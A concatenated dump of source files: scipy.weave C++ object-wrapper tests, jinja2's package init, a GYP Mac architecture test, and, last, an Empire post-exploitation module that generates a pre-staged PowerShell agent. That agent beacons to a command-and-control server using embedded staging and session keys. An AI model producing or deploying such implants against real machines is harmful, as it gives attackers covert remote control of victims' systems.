               float raw_val __attribute__ ((unused)) = val;
               """
        inline_tools.inline(code)

    @dec.slow
    def test_complex_cast(self):
        code = """
               std::complex<double> num = std::complex<double>(1.0, 1.0);
               py::object val = num;
               std::complex<double> raw_val __attribute__ ((unused)) = val;
               """
        inline_tools.inline(code)

    @dec.slow
    def test_string_cast(self):
        code = """
               py::object val = "hello";
               std::string raw_val __attribute__ ((unused)) = val;
               """
        inline_tools.inline(code)
# test class used for testing python class access from C++.
class Foo:
    """Plain fixture exercised from C++ via the scxx attr/mcall tests."""

    def bar(self):
        """Zero-argument method returning a fixed marker string."""
        return "bar results"

    def bar2(self, val1, val2):
        """Echo both positional arguments back as a tuple."""
        return (val1, val2)

    def bar3(self, val1, val2, val3=1):
        """Echo all arguments back, with val3 defaulting to 1."""
        return (val1, val2, val3)
# class StrObj:
# def __str__(self):
# return "b"
class TestObjectHasattr(TestCase):
    """py::object.hasattr() with char*, std::string and method names."""

    @dec.slow
    def test_string(self):
        a = Foo()
        a.b = 12345
        code = """
               return_val = a.hasattr("b");
               """
        res = inline_tools.inline(code,['a'])
        assert_(res)

    @dec.slow
    def test_std_string(self):
        a = Foo()
        a.b = 12345
        attr_name = "b"
        code = """
               return_val = a.hasattr(attr_name);
               """
        res = inline_tools.inline(code,['a','attr_name'])
        assert_(res)

    @dec.slow
    def test_string_fail(self):
        a = Foo()
        a.b = 12345
        code = """
               return_val = a.hasattr("c");
               """
        res = inline_tools.inline(code,['a'])
        assert_(not res)

    @dec.slow
    def test_inline(self):
        # Checks refcount behavior when the C++ code raises; only prints
        # diagnostics instead of asserting.
        #TODO: THIS NEEDS TO MOVE TO THE INLINE TEST SUITE
        a = Foo()
        a.b = 12345
        code = """
               throw_error(PyExc_AttributeError,"bummer");
               """
        try:
            before = sys.getrefcount(a)
            inline_tools.inline(code,['a'])
        except AttributeError:
            after = sys.getrefcount(a)
            try:
                inline_tools.inline(code,['a'])
            except:
                after2 = sys.getrefcount(a)
            debug_print("after and after2 should be equal in the following")
            debug_print('before, after, after2:', before, after, after2)

    @dec.slow
    def test_func(self):
        # hasattr must also find bound methods, not just data attributes.
        a = Foo()
        a.b = 12345
        code = """
               return_val = a.hasattr("bar");
               """
        res = inline_tools.inline(code,['a'])
        assert_(res)
class TestObjectAttr(TestCase):
    """py::object.attr() access with char*, std::string and py::object keys."""

    def generic_attr(self,code,args=['a']):
        # Shared driver: fetch a.b through C++ and check value and refcount.
        a = Foo()
        a.b = 12345
        before = sys.getrefcount(a.b)
        res = inline_tools.inline(code,args)
        assert_equal(res,a.b)
        del res
        after = sys.getrefcount(a.b)
        assert_equal(after,before)

    @dec.slow
    def test_char(self):
        self.generic_attr('return_val = a.attr("b");')

    @dec.slow
    def test_char_fail(self):
        assert_raises(AttributeError, self.generic_attr, 'return_val = a.attr("c");')

    @dec.slow
    def test_string(self):
        self.generic_attr('return_val = a.attr(std::string("b"));')

    @dec.slow
    def test_string_fail(self):
        assert_raises(AttributeError, self.generic_attr, 'return_val = a.attr(std::string("c"));')

    @dec.slow
    def test_obj(self):
        code = """
               py::object name = "b";
               return_val = a.attr(name);
               """
        self.generic_attr(code,['a'])

    @dec.slow
    def test_obj_fail(self):
        code = """
               py::object name = "c";
               return_val = a.attr(name);
               """
        assert_raises(AttributeError, self.generic_attr, code, ['a'])

    @dec.slow
    def test_attr_call(self):
        # Call a method through attr(); repeat to verify no refcount drift.
        a = Foo()
        res = inline_tools.inline('return_val = a.attr("bar").call();',['a'])
        first = sys.getrefcount(res)
        del res
        res = inline_tools.inline('return_val = a.attr("bar").call();',['a'])
        second = sys.getrefcount(res)
        assert_equal(res,"bar results")
        assert_equal(first,second)
class TestObjectSetAttr(TestCase):
    """py::object.set_attr() for existing and new attributes, many value types."""

    def generic_existing(self, code, desired):
        # Overwrite an attribute that already exists.
        args = ['a']
        a = Foo()
        a.b = 12345
        inline_tools.inline(code,args)
        assert_equal(a.b,desired)

    def generic_new(self, code, desired):
        # Create an attribute that did not exist before.
        args = ['a']
        a = Foo()
        inline_tools.inline(code,args)
        assert_equal(a.b,desired)

    @dec.slow
    def test_existing_char(self):
        self.generic_existing('a.set_attr("b","hello");',"hello")

    @dec.slow
    def test_new_char(self):
        self.generic_new('a.set_attr("b","hello");',"hello")

    @dec.slow
    def test_existing_string(self):
        self.generic_existing('a.set_attr("b",std::string("hello"));',"hello")

    @dec.slow
    def test_new_string(self):
        self.generic_new('a.set_attr("b",std::string("hello"));',"hello")

    @dec.slow
    def test_existing_object(self):
        code = """
               py::object obj = "hello";
               a.set_attr("b",obj);
               """
        self.generic_existing(code,"hello")

    @dec.slow
    def test_new_object(self):
        code = """
               py::object obj = "hello";
               a.set_attr("b",obj);
               """
        self.generic_new(code,"hello")

    @dec.slow
    def test_new_fail(self):
        # A non-string attribute name is expected to fail; the failure is
        # swallowed here rather than asserted.
        try:
            code = """
                   py::object obj = 1;
                   a.set_attr(obj,"hello");
                   """
            self.generic_new(code,"hello")
        except:
            pass

    @dec.slow
    def test_existing_int(self):
        self.generic_existing('a.set_attr("b",1);',1)

    @dec.slow
    def test_existing_double(self):
        self.generic_existing('a.set_attr("b",1.0);',1.0)

    @dec.slow
    def test_existing_complex(self):
        code = """
               std::complex<double> obj = std::complex<double>(1,1);
               a.set_attr("b",obj);
               """
        self.generic_existing(code,1+1j)

    @dec.slow
    def test_existing_char1(self):
        self.generic_existing('a.set_attr("b","hello");',"hello")

    @dec.slow
    def test_existing_string1(self):
        code = """
               std::string obj = std::string("hello");
               a.set_attr("b",obj);
               """
        self.generic_existing(code,"hello")
class TestObjectDel(TestCase):
    """py::object.del() attribute deletion with char*/std::string/py::object."""

    def generic(self, code):
        args = ['a']
        a = Foo()
        a.b = 12345
        inline_tools.inline(code,args)
        # Attribute must be gone after the C++ del.
        assert_(not hasattr(a,"b"))

    @dec.slow
    def test_char(self):
        self.generic('a.del("b");')

    @dec.slow
    def test_string(self):
        code = """
               std::string name = std::string("b");
               a.del(name);
               """
        self.generic(code)

    @dec.slow
    def test_object(self):
        code = """
               py::object name = py::object("b");
               a.del(name);
               """
        self.generic(code)
class TestObjectCmp(TestCase):
    """py::object comparison operators against objects and C++ literals."""

    @dec.slow
    def test_equal(self):
        a,b = 1,1
        res = inline_tools.inline('return_val = (a == b);',['a','b'])
        assert_equal(res,(a == b))

    @dec.slow
    def test_equal_objects(self):
        # Comparison must route through the Python rich-compare protocol.
        class Foo:
            def __init__(self,x):
                self.x = x
            def __cmp__(self,other):
                return cmp(self.x,other.x)
        a,b = Foo(1),Foo(2)
        res = inline_tools.inline('return_val = (a == b);',['a','b'])
        assert_equal(res,(a == b))

    @dec.slow
    def test_lt(self):
        a,b = 1,2
        res = inline_tools.inline('return_val = (a < b);',['a','b'])
        assert_equal(res,(a < b))

    @dec.slow
    def test_gt(self):
        a,b = 1,2
        res = inline_tools.inline('return_val = (a > b);',['a','b'])
        assert_equal(res,(a > b))

    @dec.slow
    def test_gte(self):
        a,b = 1,2
        res = inline_tools.inline('return_val = (a >= b);',['a','b'])
        assert_equal(res,(a >= b))

    @dec.slow
    def test_lte(self):
        a,b = 1,2
        res = inline_tools.inline('return_val = (a <= b);',['a','b'])
        assert_equal(res,(a <= b))

    @dec.slow
    def test_not_equal(self):
        a,b = 1,2
        res = inline_tools.inline('return_val = (a != b);',['a','b'])
        assert_equal(res,(a != b))

    @dec.slow
    def test_int(self):
        a = 1
        res = inline_tools.inline('return_val = (a == 1);',['a'])
        assert_equal(res,(a == 1))

    @dec.slow
    def test_int2(self):
        # literal on the left-hand side
        a = 1
        res = inline_tools.inline('return_val = (1 == a);',['a'])
        assert_equal(res,(a == 1))

    @dec.slow
    def test_unsigned_long(self):
        a = 1
        res = inline_tools.inline('return_val = (a == (unsigned long)1);',['a'])
        assert_equal(res,(a == 1))

    @dec.slow
    def test_double(self):
        a = 1
        res = inline_tools.inline('return_val = (a == 1.0);',['a'])
        assert_equal(res,(a == 1.0))

    @dec.slow
    def test_char(self):
        a = "hello"
        res = inline_tools.inline('return_val = (a == "hello");',['a'])
        assert_equal(res,(a == "hello"))

    @dec.slow
    def test_std_string(self):
        a = "hello"
        code = """
               std::string hello = std::string("hello");
               return_val = (a == hello);
               """
        res = inline_tools.inline(code,['a'])
        assert_equal(res,(a == "hello"))
class TestObjectRepr(TestCase):
    """py::object.repr() must invoke __repr__, not __str__."""

    @dec.slow
    def test_repr(self):
        class Foo:
            def __str__(self):
                return "str return"
            def __repr__(self):
                return "repr return"
        a = Foo()
        # Run twice to verify the result's refcount is stable.
        res = inline_tools.inline('return_val = a.repr();',['a'])
        first = sys.getrefcount(res)
        del res
        res = inline_tools.inline('return_val = a.repr();',['a'])
        second = sys.getrefcount(res)
        assert_equal(first,second)
        assert_equal(res,"repr return")
class TestObjectStr(TestCase):
    """py::object.str() must invoke __str__, not __repr__."""

    @dec.slow
    def test_str(self):
        class Foo:
            def __str__(self):
                return "str return"
            def __repr__(self):
                return "repr return"
        a = Foo()
        # Run twice to verify the result's refcount is stable.
        res = inline_tools.inline('return_val = a.str();',['a'])
        first = sys.getrefcount(res)
        del res
        res = inline_tools.inline('return_val = a.str();',['a'])
        second = sys.getrefcount(res)
        assert_equal(first,second)
        assert_equal(res,"str return")
class TestObjectUnicode(TestCase):
    """py::object.unicode() conversion."""
    # This ain't going to win awards for test of the year...

    @dec.slow
    def test_unicode(self):
        class Foo:
            def __repr__(self):
                return "repr return"
            def __str__(self):
                return "unicode"
        a = Foo()
        # Run twice to verify the result's refcount is stable.
        res = inline_tools.inline('return_val = a.unicode();',['a'])
        first = sys.getrefcount(res)
        del res
        res = inline_tools.inline('return_val = a.unicode();',['a'])
        second = sys.getrefcount(res)
        assert_equal(first,second)
        assert_equal(res,"unicode")
class TestObjectIsCallable(TestCase):
    """py::object.is_callable() for objects with and without __call__."""

    @dec.slow
    def test_true(self):
        class Foo:
            def __call__(self):
                return 0
        a = Foo()
        res = inline_tools.inline('return_val = a.is_callable();',['a'])
        assert_(res)

    @dec.slow
    def test_false(self):
        class Foo:
            pass
        a = Foo()
        res = inline_tools.inline('return_val = a.is_callable();',['a'])
        assert_(not res)
class TestObjectCall(TestCase):
    """py::object.call() with no args, positional args, and keyword args."""

    @dec.slow
    def test_noargs(self):
        def Foo():
            return (1,2,3)
        res = inline_tools.inline('return_val = Foo.call();',['Foo'])
        assert_equal(res,(1,2,3))
        assert_equal(sys.getrefcount(res),3)  # should be 2?

    @dec.slow
    def test_args(self):
        def Foo(val1,val2):
            return (val1,val2)
        code = """
               py::tuple args(2);
               args[0] = 1;
               args[1] = "hello";
               return_val = Foo.call(args);
               """
        res = inline_tools.inline(code,['Foo'])
        assert_equal(res,(1,"hello"))
        assert_equal(sys.getrefcount(res),2)

    @dec.slow
    def test_args_kw(self):
        def Foo(val1,val2,val3=1):
            return (val1,val2,val3)
        code = """
               py::tuple args(2);
               args[0] = 1;
               args[1] = "hello";
               py::dict kw;
               kw["val3"] = 3;
               return_val = Foo.call(args,kw);
               """
        res = inline_tools.inline(code,['Foo'])
        assert_equal(res,(1,"hello",3))
        assert_equal(sys.getrefcount(res),2)

    @dec.slow
    def test_noargs_with_args_not_instantiated(self):
        # calling a function that doesn't take args with args should fail.
        # Note: difference between this test add ``test_noargs_with_args``
        # below is that here Foo is not instantiated.
        def Foo():
            return "blah"
        code = """
               py::tuple args(2);
               args[0] = 1;
               args[1] = "hello";
               return_val = Foo.call(args);
               """
        try:
            first = sys.getrefcount(Foo)
            inline_tools.inline(code,['Foo'])
        except TypeError:
            second = sys.getrefcount(Foo)
            try:
                inline_tools.inline(code,['Foo'])
            except TypeError:
                third = sys.getrefcount(Foo)
        # first should == second, but the weird refcount error
        assert_equal(second,third)
class TestObjectMcall(TestCase):
    """py::object.mcall() method invocation with char* and std::string names."""

    @dec.slow
    def test_noargs(self):
        # Run twice to verify the result's refcount is stable.
        a = Foo()
        res = inline_tools.inline('return_val = a.mcall("bar");',['a'])
        assert_equal(res,"bar results")
        first = sys.getrefcount(res)
        del res
        res = inline_tools.inline('return_val = a.mcall("bar");',['a'])
        assert_equal(res,"bar results")
        second = sys.getrefcount(res)
        assert_equal(first,second)

    @dec.slow
    def test_args(self):
        a = Foo()
        code = """
               py::tuple args(2);
               args[0] = 1;
               args[1] = "hello";
               return_val = a.mcall("bar2",args);
               """
        res = inline_tools.inline(code,['a'])
        assert_equal(res,(1,"hello"))
        assert_equal(sys.getrefcount(res),2)

    @dec.slow
    def test_args_kw(self):
        a = Foo()
        code = """
               py::tuple args(2);
               args[0] = 1;
               args[1] = "hello";
               py::dict kw;
               kw["val3"] = 3;
               return_val = a.mcall("bar3",args,kw);
               """
        res = inline_tools.inline(code,['a'])
        assert_equal(res,(1,"hello",3))
        assert_equal(sys.getrefcount(res),2)

    @dec.slow
    def test_std_noargs(self):
        # Method name passed as a std::string variable instead of a literal.
        a = Foo()
        method = "bar"
        res = inline_tools.inline('return_val = a.mcall(method);',['a','method'])
        assert_equal(res,"bar results")
        first = sys.getrefcount(res)
        del res
        res = inline_tools.inline('return_val = a.mcall(method);',['a','method'])
        assert_equal(res,"bar results")
        second = sys.getrefcount(res)
        assert_equal(first,second)

    @dec.slow
    def test_std_args(self):
        a = Foo()
        method = "bar2"
        code = """
               py::tuple args(2);
               args[0] = 1;
               args[1] = "hello";
               return_val = a.mcall(method,args);
               """
        res = inline_tools.inline(code,['a','method'])
        assert_equal(res,(1,"hello"))
        assert_equal(sys.getrefcount(res),2)

    @dec.slow
    def test_std_args_kw(self):
        a = Foo()
        method = "bar3"
        code = """
               py::tuple args(2);
               args[0] = 1;
               args[1] = "hello";
               py::dict kw;
               kw["val3"] = 3;
               return_val = a.mcall(method,args,kw);
               """
        res = inline_tools.inline(code,['a','method'])
        assert_equal(res,(1,"hello",3))
        assert_equal(sys.getrefcount(res),2)

    @dec.slow
    def test_noargs_with_args(self):
        # calling a function that doesn't take args with args should fail.
        a = Foo()
        code = """
               py::tuple args(2);
               args[0] = 1;
               args[1] = "hello";
               return_val = a.mcall("bar",args);
               """
        try:
            first = sys.getrefcount(a)
            inline_tools.inline(code,['a'])
        except TypeError:
            second = sys.getrefcount(a)
            try:
                inline_tools.inline(code,['a'])
            except TypeError:
                third = sys.getrefcount(a)
        # first should == second, but the weird refcount error
        assert_equal(second,third)
class TestObjectHash(TestCase):
    """Tests for py::object::hash() in weave's C++ object wrapper."""

    @dec.slow
    def test_hash(self):
        # An object whose Python __hash__ returns a known constant; the
        # C++ side must observe the same value.  The inline code refers to
        # the local variable `a` by name, so that binding must stay.
        class Hashable:
            def __hash__(self):
                return 123

        a = Hashable()
        returned = inline_tools.inline('return_val = a.hash(); ',['a'])
        debug_print('hash:', returned)
        assert_equal(returned, 123)
class TestObjectIsTrue(TestCase):
    """Tests for py::object::is_true() (Python truthiness seen from C++)."""

    @dec.slow
    def test_true(self):
        # A plain instance is truthy.
        class Plain:
            pass

        a = Plain()
        returned = inline_tools.inline('return_val = a.is_true();',['a'])
        assert_equal(returned, 1)

    @dec.slow
    def test_false(self):
        # None is falsy.
        a = None
        returned = inline_tools.inline('return_val = a.is_true();',['a'])
        assert_equal(returned, 0)
class TestObjectType(TestCase):
    """Tests for py::object::type()."""

    @dec.slow
    def test_type(self):
        # The C++ accessor must return exactly what type(a) returns.
        class Plain:
            pass

        a = Plain()
        returned = inline_tools.inline('return_val = a.type();',['a'])
        assert_equal(returned, type(a))
class TestObjectSize(TestCase):
    """py::object exposes size(), len() and length() as synonyms; each
    must agree with Python's len().
    """

    def _check_len_accessor(self, expr):
        # Shared body for the three accessor spellings: build an object
        # with a fixed __len__ and compare the C++ result against len().
        class Sized:
            def __len__(self):
                return 10

        a = Sized()
        returned = inline_tools.inline(expr, ['a'])
        assert_equal(returned, len(a))

    @dec.slow
    def test_size(self):
        self._check_len_accessor('return_val = a.size();')

    @dec.slow
    def test_len(self):
        self._check_len_accessor('return_val = a.len();')

    @dec.slow
    def test_length(self):
        self._check_len_accessor('return_val = a.length();')
class TestObjectSetItemOpIndex(TestCase):
    """Tests for py::object operator[] assignment with integer indices.

    NOTE(review): these tests assert exact sys.getrefcount() values, so
    do not introduce extra references to `a` or its elements.
    """

    @dec.slow
    def test_list_refcount(self):
        a = UserList([1,2,3])
        # temporary refcount fix until I understand why it incs by one.
        inline_tools.inline("a[1] = 1234;",['a'])
        before1 = sys.getrefcount(a)
        after1 = sys.getrefcount(a)
        assert_equal(after1,before1)

    @dec.slow
    def test_set_int(self):
        # Assign a C int through operator[].
        a = UserList([1,2,3])
        inline_tools.inline("a[1] = 1234;",['a'])
        assert_equal(sys.getrefcount(a[1]),2)
        assert_equal(a[1],1234)

    @dec.slow
    def test_set_double(self):
        # Assign a C double through operator[].
        a = UserList([1,2,3])
        inline_tools.inline("a[1] = 123.0;",['a'])
        assert_equal(sys.getrefcount(a[1]),2)
        assert_equal(a[1],123.0)

    @dec.slow
    def test_set_char(self):
        # Assign a C string literal (char*) through operator[].
        a = UserList([1,2,3])
        inline_tools.inline('a[1] = "bubba";',['a'])
        assert_equal(sys.getrefcount(a[1]),2)
        assert_equal(a[1],'bubba')

    @dec.slow
    def test_set_string1(self):
        # Assign a std::string through operator[].
        a = UserList([1,2,3])
        inline_tools.inline('a[1] = std::string("sissy");',['a'])
        assert_equal(sys.getrefcount(a[1]),2)
        assert_equal(a[1],'sissy')

    @dec.slow
    def test_set_string2(self):
        # NOTE(review): despite the name this assigns a std::complex;
        # it should probably be called test_set_complex.
        a = UserList([1,2,3])
        inline_tools.inline('a[1] = std::complex<double>(1,1);',['a'])
        assert_equal(sys.getrefcount(a[1]),2)
        assert_equal(a[1],1+1j)
from UserDict import UserDict
class TestObjectSetItemOpKey(TestCase):
    """Tests for py::object operator[] assignment with arbitrary keys.

    NOTE(review): these tests assert exact sys.getrefcount() values; keep
    the statement order and the set of live references unchanged.
    """

    @dec.slow
    def test_key_refcount(self):
        # Track refcounts of the dict, the key and the value across two
        # C++-side assignments; none should drift after the first insert.
        a = UserDict()
        code = """
               py::object one = 1;
               py::object two = 2;
               py::tuple ref_counts(3);
               py::tuple obj_counts(3);
               py::tuple val_counts(3);
               py::tuple key_counts(3);
               obj_counts[0] = a.refcount();
               key_counts[0] = one.refcount();
               val_counts[0] = two.refcount();
               a[1] = 2;
               obj_counts[1] = a.refcount();
               key_counts[1] = one.refcount();
               val_counts[1] = two.refcount();
               a[1] = 2;
               obj_counts[2] = a.refcount();
               key_counts[2] = one.refcount();
               val_counts[2] = two.refcount();

               ref_counts[0] = obj_counts;
               ref_counts[1] = key_counts;
               ref_counts[2] = val_counts;
               return_val = ref_counts;
               """
        obj,key,val = inline_tools.inline(code,['a'])
        # Container refcount stable; key and value each gain exactly one
        # reference on first insertion and none on re-assignment.
        assert_equal(obj[0],obj[1])
        assert_equal(obj[1],obj[2])
        assert_equal(key[0] + 1, key[1])
        assert_equal(key[1], key[2])
        assert_equal(val[0] + 1, val[1])
        assert_equal(val[1], val[2])

    @dec.slow
    def test_set_double_exists(self):
        # Overwrite an existing float key; the key's refcount must be
        # unchanged between repeated assignments.
        a = UserDict()
        key = 10.0
        a[key] = 100.0
        inline_tools.inline('a[key] = 123.0;',['a','key'])
        first = sys.getrefcount(key)
        inline_tools.inline('a[key] = 123.0;',['a','key'])
        second = sys.getrefcount(key)
        assert_equal(first,second)
        # !! I think the following should be 3
        assert_equal(sys.getrefcount(key),5)
        assert_equal(sys.getrefcount(a[key]),2)
        assert_equal(a[key],123.0)

    @dec.slow
    def test_set_double_new(self):
        # Insert a brand-new float key from C++.
        a = UserDict()
        key = 1.0
        inline_tools.inline('a[key] = 123.0;',['a','key'])
        assert_equal(sys.getrefcount(key),4)  # should be 3
        assert_equal(sys.getrefcount(a[key]),2)
        assert_equal(a[key],123.0)

    @dec.slow
    def test_set_complex(self):
        # Complex numbers are hashable and usable as keys.
        a = UserDict()
        key = 1+1j
        inline_tools.inline("a[key] = 1234;",['a','key'])
        assert_equal(sys.getrefcount(key),4)  # should be 3
        assert_equal(sys.getrefcount(a[key]),2)
        assert_equal(a[key],1234)

    @dec.slow
    def test_set_char(self):
        # C string literal used directly as a key.
        a = UserDict()
        inline_tools.inline('a["hello"] = 123.0;',['a'])
        assert_equal(sys.getrefcount(a["hello"]),2)
        assert_equal(a["hello"],123.0)

    @dec.slow
    def test_set_class(self):
        # A user-defined hashable instance as the key.
        a = UserDict()
        class Foo:
            def __init__(self,val):
                self.val = val
            def __hash__(self):
                return self.val
        key = Foo(4)
        inline_tools.inline('a[key] = "bubba";',['a','key'])
        first = sys.getrefcount(key)
        inline_tools.inline('a[key] = "bubba";',['a','key'])
        second = sys.getrefcount(key)
        # I don't think we're leaking if this is true
        assert_equal(first,second)
        # !! BUT -- I think this should be 3
        assert_equal(sys.getrefcount(key),4)
        assert_equal(sys.getrefcount(a[key]),2)
        assert_equal(a[key],'bubba')

    @dec.slow
    def test_set_from_member(self):
        # Right-hand side of the assignment is itself a dict lookup.
        a = UserDict()
        a['first'] = 1
        a['second'] = 2
        inline_tools.inline('a["first"] = a["second"];',['a'])
        assert_equal(a['first'],a['second'])
if __name__ == "__main__":
    # Run this module's test suite when executed directly.
    run_module_suite()
| bsd-3-clause |
MatzeB/libfirm | scripts/jinja2/__init__.py | 10 | 2330 | # -*- coding: utf-8 -*-
"""
jinja2
~~~~~~
Jinja2 is a template engine written in pure Python. It provides a
Django inspired non-XML syntax but supports inline expressions and
an optional sandboxed environment.
Nutshell
--------
Here a small example of a Jinja2 template::
{% extends 'base.html' %}
{% block title %}Memberlist{% endblock %}
{% block content %}
<ul>
{% for user in users %}
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
{% endfor %}
</ul>
{% endblock %}
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
__docformat__ = 'restructuredtext en'
__version__ = '2.8-dev'
# high level interface
from jinja2.environment import Environment, Template
# loaders
from jinja2.loaders import BaseLoader, FileSystemLoader, PackageLoader, \
DictLoader, FunctionLoader, PrefixLoader, ChoiceLoader, \
ModuleLoader
# bytecode caches
from jinja2.bccache import BytecodeCache, FileSystemBytecodeCache, \
MemcachedBytecodeCache
# undefined types
from jinja2.runtime import Undefined, DebugUndefined, StrictUndefined, \
make_logging_undefined
# exceptions
from jinja2.exceptions import TemplateError, UndefinedError, \
TemplateNotFound, TemplatesNotFound, TemplateSyntaxError, \
TemplateAssertionError
# decorators and public utilities
from jinja2.filters import environmentfilter, contextfilter, \
evalcontextfilter
from jinja2.utils import Markup, escape, clear_caches, \
environmentfunction, evalcontextfunction, contextfunction, \
is_undefined
__all__ = [
'Environment', 'Template', 'BaseLoader', 'FileSystemLoader',
'PackageLoader', 'DictLoader', 'FunctionLoader', 'PrefixLoader',
'ChoiceLoader', 'BytecodeCache', 'FileSystemBytecodeCache',
'MemcachedBytecodeCache', 'Undefined', 'DebugUndefined',
'StrictUndefined', 'TemplateError', 'UndefinedError', 'TemplateNotFound',
'TemplatesNotFound', 'TemplateSyntaxError', 'TemplateAssertionError',
'ModuleLoader', 'environmentfilter', 'contextfilter', 'Markup', 'escape',
'environmentfunction', 'contextfunction', 'clear_caches', 'is_undefined',
'evalcontextfilter', 'evalcontextfunction', 'make_logging_undefined',
]
| lgpl-2.1 |
amoikevin/gyp | test/mac/gyptest-archs.py | 88 | 3580 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tests things related to ARCHS.
"""
import TestGyp
import TestMac
import re
import subprocess
import sys
# Mac-only integration test: exercises GYP's handling of the ARCHS build
# setting across the ninja, make and xcode generators.
if sys.platform == 'darwin':
  test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])

  # No ARCHS set: the default architecture depends on the Xcode version.
  test.run_gyp('test-no-archs.gyp', chdir='archs')
  test.build('test-no-archs.gyp', test.ALL, chdir='archs')
  result_file = test.built_file_path('Test', chdir='archs')
  test.must_exist(result_file)

  if TestMac.Xcode.Version() >= '0500':
    # Xcode 5 and later default to 64-bit builds.
    expected_type = ['x86_64']
  else:
    expected_type = ['i386']
  TestMac.CheckFileType(test, result_file, expected_type)

  # VALID_ARCHS restricts the build to a single architecture.
  test.run_gyp('test-valid-archs.gyp', chdir='archs')
  test.build('test-valid-archs.gyp', test.ALL, chdir='archs')
  result_file = test.built_file_path('Test', chdir='archs')
  test.must_exist(result_file)
  TestMac.CheckFileType(test, result_file, ['x86_64'])

  # Explicit ARCHS=x86_64.
  test.run_gyp('test-archs-x86_64.gyp', chdir='archs')
  test.build('test-archs-x86_64.gyp', test.ALL, chdir='archs')
  result_file = test.built_file_path('Test64', chdir='archs')
  test.must_exist(result_file)
  TestMac.CheckFileType(test, result_file, ['x86_64'])

  # Dependent static libraries must be built for each requested arch.
  test.run_gyp('test-dependencies.gyp', chdir='archs')
  test.build('test-dependencies.gyp', target=test.ALL, chdir='archs')
  products = ['c_standalone', 'd_standalone']
  for product in products:
    result_file = test.built_file_path(
        product, chdir='archs', type=test.STATIC_LIB)
    test.must_exist(result_file)

  # Fat (multi-arch) binaries are not supported by the make generator.
  if test.format != 'make':
    # Build all targets except 'exe_32_64_no_sources' that does build
    # but should not cause error when generating ninja files
    targets = [
      'static_32_64', 'shared_32_64', 'shared_32_64_bundle',
      'module_32_64', 'module_32_64_bundle',
      'exe_32_64', 'exe_32_64_bundle', 'precompiled_prefix_header_mm_32_64',
    ]

    test.run_gyp('test-archs-multiarch.gyp', chdir='archs')
    for target in targets:
      test.build('test-archs-multiarch.gyp', target=target, chdir='archs')

    # Each produced binary must contain both i386 and x86_64 slices.
    result_file = test.built_file_path(
        'static_32_64', chdir='archs', type=test.STATIC_LIB)
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])

    result_file = test.built_file_path(
        'shared_32_64', chdir='archs', type=test.SHARED_LIB)
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])

    result_file = test.built_file_path('My Framework.framework/My Framework',
                                       chdir='archs')
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
    # Check that symbol "_x" made it into both versions of the binary:
    if not all(['D _x' in subprocess.check_output(
        ['nm', '-arch', arch, result_file]) for arch in ['i386', 'x86_64']]):
      # This can only flakily fail, due to process ordering issues. If this
      # does fail flakily, then something's broken, it's not the test at fault.
      test.fail_test()

    result_file = test.built_file_path(
        'exe_32_64', chdir='archs', type=test.EXECUTABLE)
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])

    result_file = test.built_file_path('Test App.app/Contents/MacOS/Test App',
                                       chdir='archs')
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
| bsd-3-clause |
Hackplayers/Empire-mod-Hackplayers | lib/modules/external/generate_agent.py | 14 | 4774 | import os
import string
from pydispatch import dispatcher
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Generate Agent',
'Author': ['@harmj0y'],
'Description': ("Generates an agent code instance for a specified listener, "
"pre-staged, and register the agent in the database. This allows "
"the agent to begin beconing behavior immediately."),
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate the agent for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language to generate for the agent.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description' : 'Output file to write the agent code to.',
'Required' : True,
'Value' : '/tmp/agent'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def execute(self):
listenerName = self.options['Listener']['Value']
language = self.options['Language']['Value']
outFile = self.options['OutFile']['Value']
if listenerName not in self.mainMenu.listeners.activeListeners:
print helpers.color("[!] Error: %s not an active listener")
return None
activeListener = self.mainMenu.listeners.activeListeners[listenerName]
chars = string.uppercase + string.digits
sessionID = helpers.random_string(length=8, charset=chars)
stagingKey = activeListener['options']['StagingKey']['Value']
delay = activeListener['options']['DefaultDelay']['Value']
jitter = activeListener['options']['DefaultJitter']['Value']
profile = activeListener['options']['DefaultProfile']['Value']
killDate = activeListener['options']['KillDate']['Value']
workingHours = activeListener['options']['WorkingHours']['Value']
lostLimit = activeListener['options']['DefaultLostLimit']['Value']
if 'Host' in activeListener['options']:
host = activeListener['options']['Host']['Value']
else:
host = ''
# add the agent
self.mainMenu.agents.add_agent(sessionID, '0.0.0.0', delay, jitter, profile, killDate, workingHours, lostLimit, listener=listenerName, language=language)
# get the agent's session key
sessionKey = self.mainMenu.agents.get_agent_session_key_db(sessionID)
agentCode = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_agent(activeListener['options'], language=language)
if language.lower() == 'powershell':
agentCode += "\nInvoke-Empire -Servers @('%s') -StagingKey '%s' -SessionKey '%s' -SessionID '%s';" % (host, stagingKey, sessionKey, sessionID)
else:
print helpers.color('[!] Only PowerShell agent generation is supported at this time.')
return ''
# TODO: python agent generation - need to patch in crypto functions from the stager...
print helpers.color("[+] Pre-generated agent '%s' now registered." % (sessionID))
# increment the supplied file name appropriately if it already exists
i = 1
outFileOrig = outFile
while os.path.exists(outFile):
parts = outFileOrig.split('.')
if len(parts) == 1:
base = outFileOrig
ext = None
else:
base = '.'.join(parts[0:-1])
ext = parts[-1]
if ext:
outFile = "%s%s.%s" % (base, i, ext)
else:
outFile = "%s%s" % (base, i)
i += 1
f = open(outFile, 'w')
f.write(agentCode)
f.close()
